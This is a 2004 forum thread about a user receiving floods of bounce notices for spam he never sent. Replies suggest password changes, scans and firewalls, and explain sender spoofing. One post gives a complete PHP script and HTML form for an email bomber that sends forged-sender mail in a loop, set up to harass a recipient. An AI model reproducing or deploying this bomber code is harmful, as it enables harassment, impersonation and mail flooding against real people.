Someone is using my email for mass sendings

**bermich** · 03-12-2004, 01:09 PM

Everyday I get atleast 5-20 mail delivery returns, mail errors, address unknown, etc. notices. It usually says that the message could not be sent due to the following errors and has a list of all the email addresses that the message was sent to.
The only problem is: I dont send any mass emails. It has to do with those spam programs that allows you to send out a message to any number of email addresses at once.
I checked my computer for trojan viruses and deleted all the spyware crap I could find. Somehow, someone is using my email to send out this spam crap.

How could they jack into my email account if I have no trojans on my computer and never have.
I have comcast cable and use outlook express.
The only thing I can think of is someone knows my password. Is there any other way for hackers to send spam through peoples email accounts.

**adamw1** · 03-12-2004, 02:28 PM

you could download a program called hijack this and post it on a computer forum it worked for me wen i had a similair prob i find www.techtalkforums.com a good site

**SwoleCat** · 03-12-2004, 07:00 PM

VERY good site!!!!!!!!

~SC~

**symatech** · 03-12-2004, 07:03 PM

sounds like a worm. but then again im not much of a guru. i had one that collected e-mail addresses and sent messages to them using my e-mail addy as the origin. it doesnt sound like hackers, theyd be doing something more 'interesting' than sending e-mail.

good luck bermitch

**Commando_Barbi** · 03-12-2004, 09:03 PM

Hmmmm I've been getting some of the same things...

**razor67** · 03-14-2004, 12:20 AM

i have also... had over 300 return notices on 1 of my ziplip accounts.. checked it today, its been 2 days now i have 1038 notices.. im closing the account

**bermich** · 03-14-2004, 02:14 AM

I changed the password on my comcast account and had to change it to match in my outlook express. Since then (two days) I havent had anymore "mail return" notices.

Like I said. Im guessing they have a way of hacking into the account and just use it for their spam mail that gets bounced off other servers so it cant be linked to them.
Hackers do all kinds of scarey ****. Im changing ALL my passwords today.

**adamw1** · 03-14-2004, 08:08 AM

outta curiosity are you using any firewalls

**bermich** · 03-14-2004, 01:55 PM

Yes. Im using Norton personal. Someone could be slipping through because I tweaked the settings and need to check them again.

**adamw1** · 03-14-2004, 02:07 PM

you could do a port scan to check your firewall settings ill see if i can find a link

**adamw1** · 03-14-2004, 02:10 PM

www.grc.com click on shields up and it should tell you how secure your firewall is to see if that is part of the prob

**Dowstrategy** · 03-19-2004, 01:19 PM

It is probably a trojan that allows someone (especially true if you use dsl) to come in a use your system. Spammers most likely! Noton can find a lot but not all. The best solution is not to trust a software firewall but use 1 and a physical router 39 to 59 bucks and well spent.

**Dowstrategy** · 03-19-2004, 01:21 PM

possible virus also especially if you do not regularly update norton or others

**Militia** · 11-22-2004, 05:49 PM

the mass senders usualy use fake emails so maybe when their wher maass sending they used your email username by hazard and its easy if you want to send a fake mail to your friend and make him beleive this was sent from his girl friend u can use many programs like aenima u can even code your own with php i coded long time ago:

[SIZE=4]php file :[/SIZE]

<?
$from=$_POST['from'];
$to=$_POST['to'];
$subject=$_POST['subject'];
$body=$_POST['body'];
$loops=$_POST['loops'];

if ($from == "")
{
$from = "blank";
}
else
{
if ($to == "")
{
$to = "blank";
}
else
{
if ($subject == "")
{
$subject = "blank";
}
else
{
if ($body == "")
{
$body = "blank";
}
else
{
if ($loops == "")
{
$loops = "blank";
error($loops,$to,$subject,$body,$from);
}
else
{
sucess($loops,$to,$subject,$body,$from);
}
}
}
}
}

function sucess($loops,$to,$subject,$body,$from)
{
for($x = 0; $x <= $loops; $x++)
{
mail($to,$subject,$body,"From: $from");
}
print("$loops emails have been sucessfully sent! mueheheeee");
}

function error($loops,$to,$subject,$body,$from)
{
if (($from == "blank") || ($loops == "blank") || ($body == "blank") || ($subject == "blank") || ($to == "blank"))
{
print("Please make sure you fill in all required fields!");
}
}
upload this php into your webserver that support php

html file :

<html>
<form action="the domain of your php file" method="post">
From: <input type="text" name="from" value="[email protected]" size="40"><br>
To: <input type="text" name="to" value="[email protected]" size="40"><br>
Subject: <input type="text" name="subject" value="You've Been Bombed" size="60"><br>
Body: <textarea wrap="virtual" rows="10" name="body" cols="50">Unlucky, you must have pissed me off in some way</textarea><br>
Loops: <input type="text" name="loops" value="10" length="5"><br>
<input type="submit" value="Send!">
</form>
<br><br><br>
</html>

**max2extreme** · 11-23-2004, 12:50 PM

What this sounds like is called a Joe Job. In basic terms this is what is happening. Someone is trying to DOS a mail server (denial of service). So your email address is listed someone on spam mail, so they have your email address... Some attacker is sending out MASS emails from his computer but he is spoofing it so when the mail server replies with a "no such address", its going to your email address. chances are this is not a personal attack. the attacker probably has a long list of valid email addresses that hes using and yours happens to be on that list. Theres nothing you can really do about it. Just ride it out. Set your spam permissions, make it so you dont get those auto-replies for a while, etc. Once the mail server is broke or the attacker realises its not working, then it'll stop.

max

**max2extreme** · 11-23-2004, 12:52 PM

just FYI, id bet that its not a virus.

**MMC78** · 11-23-2004, 11:58 PM

Listen

Your computer is most likely not comprimised. It is very easy to make email look like it has been sent from someone else. If you don't beleive me, I'll send you a letter from [email protected].

The reply field for any mail program can be easily changed. Someone most likely decided to use a real replyto: email address so items sent to it wouldn't bounce.

If you can get ahold of an actual email being sent (including the header) then there are ways to help you track down who might be doing this.

**max2extreme** · 11-24-2004, 04:30 AM

yep mmc78...nothing he can do about it.

**arthurb999** · 11-26-2004, 12:57 PM

This just started happening to me as well.. I scaned the **** out of my computer.. NAV, The Cleaner, Ad-aware, Spybot, updated Spyware Blaster, etc.... nothing. I have a router (hardware firewall) and Zone Alarm Pro. Windows XP SP2 and Office 2000 fully updated...

Guess it's as stated above.